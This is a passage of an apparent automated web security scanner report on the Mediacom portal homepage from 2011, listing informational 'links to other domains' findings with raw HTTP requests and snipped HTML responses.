P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135429
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=19" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;d73f3adc;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;a5152b80;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/27.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.21. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=20 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313378123420; dslv=1313378123421; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 03:44:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135913
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=21" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;3c3f0ec6;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;51283a8e;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/29.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.22. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=32 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=31
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313399071927; dslv=1313399071928; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 09:33:21 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133644
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=33" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;6101b50f;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;a5152b80;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/27.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.23. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=31 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=30
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313397325261; dslv=1313397325261; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 09:04:19 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 132302
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=32" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;258a6147;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f8d7f329;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/27.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.24. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=28 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=27
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313392089483; dslv=1313392089483; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 07:36:14 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133156
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=29" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;c6280d61;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;1c34b7b2;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
